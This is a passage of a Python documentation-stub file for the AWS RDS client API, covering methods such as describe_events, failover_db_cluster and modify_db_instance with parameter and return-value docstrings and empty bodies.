        ``VpcId``, ``InstanceCreateTime``, ``MasterUsername``,
        ``EngineVersion``, ``LicenseModel``, ``SnapshotType``, ``Iops``,
        ``OptionGroupName``, ``PercentProgress``, ``SourceRegion``,
        ``SourceDBSnapshotIdentifier``, ``StorageType``,
        ``TdeCredentialArn``, ``Encrypted``, ``KmsKeyId``,
        ``DBSnapshotArn``, ``Timezone`` and
        ``IAMDatabaseAuthenticationEnabled``.
    :returns: Related actions: CreateDBSnapshot, DeleteDBSnapshot.
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_db_subnet_groups(DBSubnetGroupName=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Return descriptions of DB subnet groups.

    If ``DBSubnetGroupName`` is supplied, only that subnet group is
    described. For an overview of CIDR ranges, go to the Wikipedia
    Tutorial. See also: AWS API Documentation.

    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: Name of the DB subnet group to describe.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribeDBSubnetGroups request; results resume after it.
    :rtype: dict
    :return: Dict with keys ``'Marker'`` and ``'DBSubnetGroups'``. Each
        group dict carries ``DBSubnetGroupName``,
        ``DBSubnetGroupDescription``, ``VpcId``, ``SubnetGroupStatus``,
        ``Subnets`` (SubnetIdentifier, SubnetAvailabilityZone.Name,
        SubnetStatus) and ``DBSubnetGroupArn``.
    :returns: Related actions: CreateDBSubnetGroup, ModifyDBSubnetGroup,
        DescribeDBSubnetGroups, DeleteDBSubnetGroup.
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_engine_default_cluster_parameters(DBParameterGroupFamily=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Return default engine/system parameters for the cluster database engine.

    For more information on Amazon Aurora, see Aurora on Amazon RDS in
    the Amazon RDS User Guide. See also: AWS API Documentation.

    :type DBParameterGroupFamily: string
    :param DBParameterGroupFamily: [REQUIRED] Name of the DB cluster
        parameter group family to return engine parameter information for.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribeEngineDefaultClusterParameters request; results resume
        after it.
    :rtype: dict
    :return: Dict with key ``'EngineDefaults'`` containing
        ``DBParameterGroupFamily``, ``Marker`` and a ``Parameters`` list
        of dicts with ``ParameterName``, ``ParameterValue``,
        ``Description``, ``Source``, ``ApplyType``, ``DataType``,
        ``AllowedValues``, ``IsModifiable``, ``MinimumEngineVersion``
        and ``ApplyMethod`` ('immediate' | 'pending-reboot').
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_engine_default_parameters(DBParameterGroupFamily=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Return default engine/system parameters for the specified database engine.

    See also: AWS API Documentation.

    :type DBParameterGroupFamily: string
    :param DBParameterGroupFamily: [REQUIRED] Name of the DB parameter
        group family.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribeEngineDefaultParameters request; results resume after it.
    :rtype: dict
    :return: Dict with key ``'EngineDefaults'`` containing
        ``DBParameterGroupFamily``, ``Marker`` and a ``Parameters`` list
        of dicts with ``ParameterName``, ``ParameterValue``,
        ``Description``, ``Source``, ``ApplyType``, ``DataType``,
        ``AllowedValues``, ``IsModifiable``, ``MinimumEngineVersion``
        and ``ApplyMethod`` ('immediate' | 'pending-reboot').
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_event_categories(SourceType=None, Filters=None):
    """
    List event categories for all source types, or for one source type.

    The full list of event categories and source types appears in the
    Events topic of the Amazon RDS User Guide. See also: AWS API
    Documentation.

    :type SourceType: string
    :param SourceType: The type of source that will be generating the
        events. Valid values: db-instance | db-parameter-group |
        db-security-group | db-snapshot.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :rtype: dict
    :return: Dict with key ``'EventCategoriesMapList'``: a list of dicts,
        each carrying ``SourceType`` and an ``EventCategories`` list of
        strings.
    :returns: (string) --
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_event_subscriptions(SubscriptionName=None, Filters=None, MaxRecords=None, Marker=None):
    """
    List event-notification subscription descriptions for this account.

    Each description includes SubscriptionName, SNSTopicARN, CustomerID,
    SourceType, SourceID, CreationTime and Status. If
    ``SubscriptionName`` is supplied, only that subscription is
    described. See also: AWS API Documentation.

    :type SubscriptionName: string
    :param SubscriptionName: Name of the RDS event notification
        subscription to describe.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribeEventSubscriptions request; results resume after it.
    :rtype: dict
    :return: Dict with keys ``'Marker'`` and ``'EventSubscriptionsList'``.
        Each subscription dict carries ``CustomerAwsId``,
        ``CustSubscriptionId``, ``SnsTopicArn``, ``Status``,
        ``SubscriptionCreationTime``, ``SourceType``, ``SourceIdsList``,
        ``EventCategoriesList``, ``Enabled`` and
        ``EventSubscriptionArn``.
    :returns: (string) --
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_events(SourceIdentifier=None, SourceType=None, StartTime=None, EndTime=None, Duration=None, EventCategories=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Return events for DB instances, security groups, snapshots and
    parameter groups from the past 14 days.

    Events for a particular resource are obtained by supplying its name;
    by default the past hour of events is returned. See also: AWS API
    Documentation.

    :type SourceIdentifier: string
    :param SourceIdentifier: Identifier of the event source; all sources
        are included when omitted. Constraints: when supplied,
        ``SourceType`` must also be provided; for source type DBInstance
        supply a DBInstanceIdentifier, for DBSecurityGroup a
        DBSecurityGroupName, for DBParameterGroup a DBParameterGroupName,
        for DBSnapshot a DBSnapshotIdentifier; cannot end with a hyphen
        or contain two consecutive hyphens.
    :type SourceType: string
    :param SourceType: The event source to retrieve events for; all
        events are returned when omitted.
    :type StartTime: datetime
    :param StartTime: Beginning of the interval, in ISO 8601 format (see
        the ISO8601 Wikipedia page). Example: 2009-07-08T18:00Z
    :type EndTime: datetime
    :param EndTime: End of the interval, in ISO 8601 format (see the
        ISO8601 Wikipedia page). Example: 2009-07-08T18:00Z
    :type Duration: integer
    :param Duration: Number of minutes of events to retrieve. Default: 60
    :type EventCategories: list
    :param EventCategories: Event categories (strings) that trigger
        notifications for an event notification subscription.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous DescribeEvents
        request; results resume after it.
    :rtype: dict
    :return: Dict with keys ``'Marker'`` and ``'Events'``. Each event
        dict carries ``SourceIdentifier``, ``SourceType``
        ('db-instance' | 'db-parameter-group' | 'db-security-group' |
        'db-snapshot' | 'db-cluster' | 'db-cluster-snapshot'),
        ``Message``, ``EventCategories``, ``Date`` and ``SourceArn``.
    :returns: (string) --
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_option_group_options(EngineName=None, MajorEngineVersion=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Describe all available option group options.

    See also: AWS API Documentation.

    :type EngineName: string
    :param EngineName: [REQUIRED] Options available for this engine name
        will be described.
    :type MajorEngineVersion: string
    :param MajorEngineVersion: When specified, restricts results to
        options for this major engine version.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous request; results
        resume after it.
    :rtype: dict
    :return: Dict with keys ``'OptionGroupOptions'`` and ``'Marker'``.
        Each option dict carries ``Name``, ``Description``,
        ``EngineName``, ``MajorEngineVersion``,
        ``MinimumRequiredMinorEngineVersion``, ``PortRequired``,
        ``DefaultPort``, ``OptionsDependedOn``, ``OptionsConflictsWith``,
        ``Persistent``, ``Permanent``, ``OptionGroupOptionSettings``
        (SettingName, SettingDescription, DefaultValue, ApplyType,
        AllowedValues, IsModifiable) and ``OptionGroupOptionVersions``
        (Version, IsDefault).
    :returns: (string) --
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_option_groups(OptionGroupName=None, Filters=None, Marker=None, MaxRecords=None, EngineName=None, MajorEngineVersion=None):
    """
    Describe the available option groups.

    See also: AWS API Documentation.

    :type OptionGroupName: string
    :param OptionGroupName: Name of the option group to describe. Cannot
        be supplied together with EngineName or MajorEngineVersion.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type Marker: string
    :param Marker: Pagination token from a previous DescribeOptionGroups
        request; results resume after it.
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type EngineName: string
    :param EngineName: Restricts the list to option groups associated
        with this database engine.
    :type MajorEngineVersion: string
    :param MajorEngineVersion: Restricts the list to option groups
        associated with this engine version; requires EngineName.
    :rtype: dict
    :return: Dict with keys ``'OptionGroupsList'`` and ``'Marker'``. Each
        group dict carries ``OptionGroupName``,
        ``OptionGroupDescription``, ``EngineName``,
        ``MajorEngineVersion``, ``Options`` (OptionName,
        OptionDescription, Persistent, Permanent, Port, OptionVersion,
        OptionSettings with Name/Value/DefaultValue/Description/
        ApplyType/DataType/AllowedValues/IsModifiable/IsCollection,
        DBSecurityGroupMemberships, VpcSecurityGroupMemberships),
        ``AllowsVpcAndNonVpcInstanceMemberships``, ``VpcId`` and
        ``OptionGroupArn``.
    :returns: Related actions: ModifyDBInstance, RebootDBInstance,
        RestoreDBInstanceFromDBSnapshot, RestoreDBInstanceToPointInTime.
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_orderable_db_instance_options(Engine=None, EngineVersion=None, DBInstanceClass=None, LicenseModel=None, Vpc=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Return orderable DB instance options for the specified engine.

    See also: AWS API Documentation.

    :type Engine: string
    :param Engine: [REQUIRED] Name of the engine to retrieve DB instance
        options for.
    :type EngineVersion: string
    :param EngineVersion: Show only offerings matching this engine
        version.
    :type DBInstanceClass: string
    :param DBInstanceClass: Show only offerings matching this DB instance
        class.
    :type LicenseModel: string
    :param LicenseModel: Show only offerings matching this license model.
    :type Vpc: boolean
    :param Vpc: Show only VPC (true) or non-VPC (false) offerings.
    :type Filters: list
    :param Filters: Not currently supported. Each element is a dict with
        required keys ``Name`` (string) and ``Values`` (list of strings).
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribeOrderableDBInstanceOptions request; results resume after
        it.
    :rtype: dict
    :return: Dict with keys ``'OrderableDBInstanceOptions'`` and
        ``'Marker'``. Each option dict carries ``Engine``,
        ``EngineVersion``, ``DBInstanceClass``, ``LicenseModel``,
        ``AvailabilityZones`` (Name), ``MultiAZCapable``,
        ``ReadReplicaCapable``, ``Vpc``, ``SupportsStorageEncryption``,
        ``StorageType``, ``SupportsIops``,
        ``SupportsEnhancedMonitoring`` and
        ``SupportsIAMDatabaseAuthentication``.
    :returns: OrderableDBInstanceOption
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_pending_maintenance_actions(ResourceIdentifier=None, Filters=None, Marker=None, MaxRecords=None):
    """
    List resources (for example, DB instances) with at least one pending
    maintenance action.

    See also: AWS API Documentation.

    :type ResourceIdentifier: string
    :param ResourceIdentifier: ARN of a resource to return pending
        maintenance actions for.
    :type Filters: list
    :param Filters: A filter selecting one or more resources to return
        pending maintenance actions for. Supported filters:
        ``db-cluster-id`` (DB cluster identifiers or cluster ARNs) and
        ``db-instance-id`` (DB instance identifiers or instance ARNs);
        only actions for the identified resources are returned. Each
        element is a dict with required keys ``Name`` (string) and
        ``Values`` (list of strings).
    :type Marker: string
    :param Marker: Pagination token from a previous
        DescribePendingMaintenanceActions request; results resume after
        it, up to ``MaxRecords`` records.
    :type MaxRecords: integer
    :param MaxRecords: Maximum records per response page (default 100,
        minimum 20, maximum 100). When more records exist, a pagination
        marker is included in the response.
    :rtype: dict
    :return: Dict with keys ``'PendingMaintenanceActions'`` and
        ``'Marker'``. Each entry carries ``ResourceIdentifier`` and a
        ``PendingMaintenanceActionDetails`` list of dicts with
        ``Action``, ``AutoAppliedAfterDate``, ``ForcedApplyDate``,
        ``OptInStatus``, ``CurrentApplyDate`` and ``Description``.
    """
    # Documentation stub only -- the real client method is generated by
    # botocore at runtime from the service model.
    pass
def describe_reserved_db_instances(ReservedDBInstanceId=None, ReservedDBInstancesOfferingId=None, DBInstanceClass=None, Duration=None, ProductDescription=None, OfferingType=None, MultiAZ=None, Filters=None, MaxRecords=None, Marker=None):
    """Return information about reserved DB instances for this account, or
    about a single specified reserved DB instance.

    See also: AWS API Documentation.

    :param ReservedDBInstanceId: (string) Show only the reservation that
        matches this reservation ID.
    :param ReservedDBInstancesOfferingId: (string) Show only purchased
        reservations matching this offering identifier.
    :param DBInstanceClass: (string) Show only reservations matching this
        DB instance class.
    :param Duration: (string) Show only reservations for this duration,
        in years or seconds. Valid values: 1 | 3 | 31536000 | 94608000.
    :param ProductDescription: (string) Show only reservations matching
        this product description.
    :param OfferingType: (string) Show only offerings matching this
        offering type. Valid values: 'Partial Upfront' | 'All Upfront' |
        'No Upfront'.
    :param MultiAZ: (boolean) Show only reservations matching this
        Multi-AZ setting.
    :param Filters: (list) This parameter is not currently supported.
        Each element is a dict with required 'Name' (string) and 'Values'
        (list of strings) keys.
    :param MaxRecords: (integer) Maximum number of records per response
        page; when more are available a pagination marker is returned.
        Default: 100. Constraints: minimum 20, maximum 100.
    :param Marker: (string) Optional pagination token from a previous
        request; only records beyond it (up to MaxRecords) are returned.
    :rtype: dict
    :return: A dict containing 'Marker' and a 'ReservedDBInstances' list.
        Each list entry describes one reservation: its identifiers, DB
        instance class, start time, duration, fixed/usage price, currency
        code, instance count, product description, offering type,
        Multi-AZ flag, state, recurring charges, and ARN.
    """
    pass
def describe_reserved_db_instances_offerings(ReservedDBInstancesOfferingId=None, DBInstanceClass=None, Duration=None, ProductDescription=None, OfferingType=None, MultiAZ=None, Filters=None, MaxRecords=None, Marker=None):
    """List the available reserved DB instance offerings.

    See also: AWS API Documentation.

    :param ReservedDBInstancesOfferingId: (string) Show only the offering
        matching this reservation identifier.
        Example: 438012d3-4052-4cc7-b2e3-8d3372e0e706
    :param DBInstanceClass: (string) Show only offerings matching this
        DB instance class.
    :param Duration: (string) Show only offerings for this duration, in
        years or seconds. Valid values: 1 | 3 | 31536000 | 94608000.
    :param ProductDescription: (string) Show only offerings matching this
        product description.
    :param OfferingType: (string) Show only offerings matching this
        offering type. Valid values: 'Partial Upfront' | 'All Upfront' |
        'No Upfront'.
    :param MultiAZ: (boolean) Show only offerings matching this Multi-AZ
        setting.
    :param Filters: (list) This parameter is not currently supported.
        Each element is a dict with required 'Name' (string) and 'Values'
        (list of strings) keys.
    :param MaxRecords: (integer) Maximum number of records per response
        page; when more are available a pagination marker is returned.
        Default: 100. Constraints: minimum 20, maximum 100.
    :param Marker: (string) Optional pagination token from a previous
        request; only records beyond it (up to MaxRecords) are returned.
    :rtype: dict
    :return: A dict containing 'Marker' and a
        'ReservedDBInstancesOfferings' list. Each list entry describes
        one offering: its identifier, DB instance class, duration,
        fixed/usage price, currency code, product description, offering
        type, Multi-AZ flag, and recurring charges.
    """
    pass
def describe_source_regions(RegionName=None, MaxRecords=None, Marker=None, Filters=None):
    """List the source AWS regions from which the current AWS region can
    create a Read Replica or copy a DB snapshot. Supports pagination.

    See also: AWS API Documentation.

    :param RegionName: (string) The source region name, e.g. us-east-1.
        Must be a valid AWS Region name.
    :param MaxRecords: (integer) Maximum number of records per response
        page; when more exist a pagination marker is returned.
        Default: 100. Constraints: minimum 20, maximum 100.
    :param Marker: (string) Optional pagination token from a previous
        DescribeSourceRegions request; only records beyond it (up to
        MaxRecords) are returned.
    :param Filters: (list) This parameter is not currently supported.
        Each element is a dict with required 'Name' (string) and 'Values'
        (list of strings) keys.
    :rtype: dict
    :return: A dict containing 'Marker' and a 'SourceRegions' list whose
        entries each hold 'RegionName', 'Endpoint', and 'Status'.
    """
    pass
def download_db_log_file_portion(DBInstanceIdentifier=None, LogFileName=None, Marker=None, NumberOfLines=None):
    """Download all or part of the specified log file, up to 1 MB in size.

    See also: AWS API Documentation.

    :param DBInstanceIdentifier: (string) [REQUIRED] Customer-assigned
        name of the DB instance holding the log file. Must be 1-63
        alphanumeric characters or hyphens, start with a letter, and not
        end with a hyphen or contain two consecutive hyphens.
    :param LogFileName: (string) [REQUIRED] Name of the log file to
        download.
    :param Marker: (string) Pagination token from the previous request,
        or '0'. When given, only records beyond the marker are returned,
        until end of file or up to NumberOfLines.
    :param NumberOfLines: (integer) Number of lines to download; the file
        is truncated at 1 MB if the requested lines would exceed that.
        Interaction with Marker:
        - Neither given: up to 10000 of the most recent lines.
        - Only NumberOfLines: the most recent lines from the file's end.
        - Marker == '0': that many lines from the file's beginning.
        To page through the file in blocks, pass Marker='0' on the first
        request, then feed each response's 'Marker' back in until
        'AdditionalDataPending' is false.
    :rtype: dict
    :return: A dict with 'LogFileData' (string), 'Marker' (string), and
        'AdditionalDataPending' (boolean).
    """
    pass
def failover_db_cluster(DBClusterIdentifier=None, TargetDBInstanceIdentifier=None):
    """Force a failover for a DB cluster.

    A failover promotes one of the Aurora Replicas (read-only instances)
    in the cluster to be the primary instance (the cluster writer).
    Amazon Aurora fails over to a replica automatically when the primary
    fails; forcing a failover lets you simulate such a failure for
    testing. Because every instance in a cluster has its own endpoint
    address, existing connections using those addresses must be cleaned
    up and re-established after the failover completes.

    For more information on Amazon Aurora, see Aurora on Amazon RDS in
    the Amazon RDS User Guide.
    See also: AWS API Documentation.

    :param DBClusterIdentifier: (string) Identifier of the DB cluster to
        fail over; not case-sensitive. Must be 1-63 alphanumeric
        characters or hyphens, start with a letter, and not end with a
        hyphen or contain two consecutive hyphens.
    :param TargetDBInstanceIdentifier: (string) Name of the instance to
        promote to primary. Must identify an Aurora Replica in the
        cluster, e.g. mydbcluster-replica1.
    :rtype: dict
    :return: A dict whose 'DBCluster' entry describes the cluster after
        the failover: storage, availability zones, backup retention,
        identifiers, parameter/subnet groups, status, endpoints,
        engine/version, restore times, port, master username, option
        group memberships, maintenance/backup windows, replication
        source, read replica identifiers, cluster members (with
        IsClusterWriter and PromotionTier), VPC security groups, hosted
        zone, encryption/KMS details, resource id, ARN, associated IAM
        roles, IAM database authentication flag, and creation time. This
        data type is used as a response element for CreateDBCluster,
        DeleteDBCluster, FailoverDBCluster, ModifyDBCluster,
        RestoreDBClusterFromSnapshot, and RestoreDBClusterToPointInTime.
    """
    pass
def generate_db_auth_token(DBHostname=None, Port=None, DBUsername=None, Region=None):
    """Generate an authentication token for connecting to a database with
    IAM credentials.

    :param DBHostname: (str) Hostname of the database to connect to.
    :param Port: (int) Port number the database listens on.
    :param DBUsername: (str) Username to log in as.
    :param Region: (str) Region the database is in; when None, the
        client's region is used.
    """
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned URL for a client method and its arguments.

    :param ClientMethod: (string) The client method to presign for.
    :param Params: (dict) The parameters normally passed to
        ClientMethod.
    :param ExpiresIn: (int) Number of seconds the presigned URL remains
        valid; defaults to one hour (3600 seconds).
    :param HttpMethod: (string) HTTP method to use on the generated URL;
        defaults to whatever the method's model uses.
    """
    pass
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    :param operation_name: (string) The operation name — the same name
        as the client method. For example, if the method name is
        create_foo (normally invoked as client.create_foo(**kwargs)) and
        the create_foo operation supports pagination, you can call
        client.get_paginator('create_foo').
    :rtype: L{botocore.paginate.Paginator}
    """
    pass
def get_waiter(waiter_name=None):
    """Return an object that can wait for some service condition.

    The stub previously had no docstring and no parameters; the real
    boto3 client API accepts the waiter's name, so it is exposed here
    with a default to stay backward-compatible with no-argument callers.

    :param waiter_name: (string) Name of the waiter to get, e.g.
        'db_instance_available'. See the waiters section of the service
        documentation for the list of available waiter names.
    :rtype: botocore.waiter.Waiter
    """
    pass
def list_tags_for_resource(ResourceName=None, Filters=None):
    """List all tags on an Amazon RDS resource.

    For an overview on tagging an Amazon RDS resource, see Tagging
    Amazon RDS Resources.
    See also: AWS API Documentation.

    :param ResourceName: (string) [REQUIRED] The Amazon RDS resource
        whose tags should be listed, given as an Amazon Resource Name
        (ARN). For information about creating an ARN, see Constructing
        an RDS Amazon Resource Name (ARN).
    :param Filters: (list) This parameter is not currently supported.
        Each element is a dict with required 'Name' (string) and 'Values'
        (list of strings) keys.
    :rtype: dict
    :return: A dict whose 'TagList' is a list of dicts, each holding a
        'Key' and 'Value' string pair.
    """
    pass
def modify_db_cluster(DBClusterIdentifier=None, NewDBClusterIdentifier=None, ApplyImmediately=None, BackupRetentionPeriod=None, DBClusterParameterGroupName=None, VpcSecurityGroupIds=None, Port=None, MasterUserPassword=None, OptionGroupName=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, EnableIAMDatabaseAuthentication=None):
    """Modify settings for an Amazon Aurora DB cluster.

    One or more database configuration parameters can be changed by
    supplying them with new values in the request. For more information
    on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User
    Guide.
    See also: AWS API Documentation.

    :param DBClusterIdentifier: (string) [REQUIRED] Identifier of the
        cluster being modified; not case-sensitive. Must name an
        existing DB cluster, be 1-63 alphanumeric characters or hyphens,
        start with a letter, and not end with a hyphen or contain two
        consecutive hyphens.
    :param NewDBClusterIdentifier: (string) New identifier when renaming
        the cluster; stored lowercase. Same character constraints as
        DBClusterIdentifier. Example: my-cluster2.
    :param ApplyImmediately: (boolean) When true, this request's changes
        and any pending changes are applied asynchronously as soon as
        possible, ignoring the PreferredMaintenanceWindow; when false,
        changes apply during the next maintenance window. Only affects
        NewDBClusterIdentifier and MasterUserPassword — all other
        changes apply immediately regardless. Default: false.
    :param BackupRetentionPeriod: (integer) Days automated backups are
        retained; minimum 1. Default: 1. Constraints: 1 to 35.
    :param DBClusterParameterGroupName: (string) Name of the DB cluster
        parameter group to use.
    :param VpcSecurityGroupIds: (list of strings) VPC security groups
        the cluster will belong to.
    :param Port: (integer) Port on which the cluster accepts
        connections. Constraints: 1150-65535. Default: the original
        cluster's port.
    :param MasterUserPassword: (string) New master password; any
        printable ASCII character except '/', ''', or '@'. Must be 8-41
        characters.
    :param OptionGroupName: (string) Option group to associate with the
        cluster. Changing it causes no outage except that an OEM-
        enabling change can briefly (sub-second) reject new connections;
        applied during the next maintenance window unless
        ApplyImmediately is true. Permanent options cannot be removed,
        and an option group cannot be detached once associated.
    :param PreferredBackupWindow: (string) Daily time range for
        automated backups (when enabled via BackupRetentionPeriod).
        Format hh24:mi-hh24:mi in UTC, at least 30 minutes, and must not
        conflict with the maintenance window. Default: a random
        30-minute window from a per-region 8-hour block (see Adjusting
        the Preferred Maintenance Window in the Amazon RDS User Guide).
    :param PreferredMaintenanceWindow: (string) Weekly maintenance
        window, format ddd:hh24:mi-ddd:hh24:mi in UTC, minimum 30
        minutes. Valid days: Mon, Tue, Wed, Thu, Fri, Sat, Sun.
        Default: a random 30-minute window on a random day from a
        per-region 8-hour block.
    :param EnableIAMDatabaseAuthentication: (boolean) True to map AWS
        IAM accounts to database accounts. Default: false.
    :rtype: dict
    :return: A dict whose 'DBCluster' entry describes the modified
        cluster: storage, availability zones, backup retention,
        identifiers, parameter/subnet groups, status, endpoints,
        engine/version, restore times, port, master username, option
        group memberships, maintenance/backup windows, replication
        source, read replica identifiers, cluster members, VPC security
        groups, hosted zone, encryption/KMS details, resource id, ARN,
        associated IAM roles, IAM database authentication flag, and
        creation time. This data type is used as a response element for
        CreateDBCluster, DeleteDBCluster, FailoverDBCluster,
        ModifyDBCluster, RestoreDBClusterFromSnapshot, and
        RestoreDBClusterToPointInTime.
    """
    pass
def modify_db_cluster_parameter_group(DBClusterParameterGroupName=None, Parameters=None):
    """Modify the parameters of a DB cluster parameter group.

    To modify more than one parameter, submit a list of ParameterName,
    ParameterValue, and ApplyMethod entries; at most 20 parameters can
    be modified in a single request. For more information on Amazon
    Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation.

    :param DBClusterParameterGroupName: (string) [REQUIRED] Name of the
        DB cluster parameter group to modify.
    :param Parameters: (list) [REQUIRED] Parameters to modify. Each
        element is a dict (the request/response parameter data type used
        by ModifyDBParameterGroup, ResetDBParameterGroup,
        DescribeEngineDefaultParameters, and DescribeDBParameters) with
        keys:
        - ParameterName (string): name of the parameter.
        - ParameterValue (string): value of the parameter.
        - Description (string): description of the parameter.
        - Source (string): source of the parameter value.
        - ApplyType (string): engine-specific parameters type.
        - DataType (string): valid data type for the parameter.
        - AllowedValues (string): valid range of values.
        - IsModifiable (boolean): whether the parameter can be modified;
          some parameters have security or operational implications that
          prevent changes.
        - MinimumEngineVersion (string): earliest engine version the
          parameter can apply to.
        - ApplyMethod (string): when to apply updates, 'immediate' or
          'pending-reboot'.
    :rtype: dict
    :return: A dict with 'DBClusterParameterGroupName' (string). That
        name must be 1 to 255 alphanumeric characters, start with a
        letter, and not end with a hyphen or contain two consecutive
        hyphens.
    """
    pass
def modify_db_cluster_snapshot_attribute(DBClusterSnapshotIdentifier=None, AttributeName=None, ValuesToAdd=None, ValuesToRemove=None):
    """Add or remove an attribute and its values on a manual DB cluster
    snapshot.

    To share a manual DB cluster snapshot with other AWS accounts, set
    AttributeName to restore and list the authorized account IDs in
    ValuesToAdd. The value all makes the snapshot public (copyable and
    restorable by any AWS account) — do not use it for snapshots holding
    private information. Encrypted snapshots can be shared only with an
    explicit list of account IDs, never with all. To inspect which
    accounts currently have access, or whether the snapshot is public or
    private, use the DescribeDBClusterSnapshotAttributes API action.
    See also: AWS API Documentation.

    :param DBClusterSnapshotIdentifier: (string) [REQUIRED] Identifier
        of the DB cluster snapshot whose attributes are modified.
    :param AttributeName: (string) [REQUIRED] Name of the attribute to
        modify; use restore to manage copy/restore authorization for
        other AWS accounts.
    :param ValuesToAdd: (list of strings) Values to add to the attribute
        named by AttributeName: one or more AWS account IDs, or all to
        allow any account to restore the snapshot (never use all for
        snapshots with private data).
    :param ValuesToRemove: (list of strings) Values to remove from the
        attribute named by AttributeName: one or more AWS account
        identifiers, or all to revoke blanket authorization. Note that
        removing all leaves explicitly-listed account IDs still able to
        copy or restore the snapshot.
    :rtype: dict
    :return: A dict whose 'DBClusterSnapshotAttributesResult' holds the
        snapshot identifier and a 'DBClusterSnapshotAttributes' list of
        {'AttributeName': string, 'AttributeValues': list of strings}
        entries.
    """
    pass
def modify_db_instance(DBInstanceIdentifier=None, AllocatedStorage=None, DBInstanceClass=None, DBSubnetGroupName=None, DBSecurityGroups=None, VpcSecurityGroupIds=None, ApplyImmediately=None, MasterUserPassword=None, DBParameterGroupName=None, BackupRetentionPeriod=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, MultiAZ=None, EngineVersion=None, AllowMajorVersionUpgrade=None, AutoMinorVersionUpgrade=None, LicenseModel=None, Iops=None, OptionGroupName=None, NewDBInstanceIdentifier=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, CACertificateIdentifier=None, Domain=None, CopyTagsToSnapshot=None, MonitoringInterval=None, DBPortNumber=None, PubliclyAccessible=None, MonitoringRoleArn=None, DomainIAMRoleName=None, PromotionTier=None, EnableIAMDatabaseAuthentication=None):
    """Modify configuration settings of an existing Amazon RDS DB instance.

    One or more database configuration parameters can be changed by
    supplying the parameter(s) and the new value(s) in the request.  Unless
    noted otherwise, changes are applied during the next maintenance window
    when ``ApplyImmediately`` is ``False`` (the default) and as soon as
    possible when it is ``True``.

    See also: AWS API Documentation (RDS ``ModifyDBInstance``).

    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED] Identifier of an existing DB
        instance, stored as a lowercase string. 1-63 alphanumeric
        characters or hyphens; first character must be a letter; cannot end
        with a hyphen or contain two consecutive hyphens.
    :type AllocatedStorage: integer
    :param AllocatedStorage: New storage capacity of the RDS instance.
        Must be at least 10% greater than the current value (values below
        that are rounded up to 10% greater). Valid ranges: 5-6144 for
        MySQL/MariaDB/PostgreSQL, 10-6144 for Oracle; cannot be modified
        for SQL Server. Migrating between standard storage and Provisioned
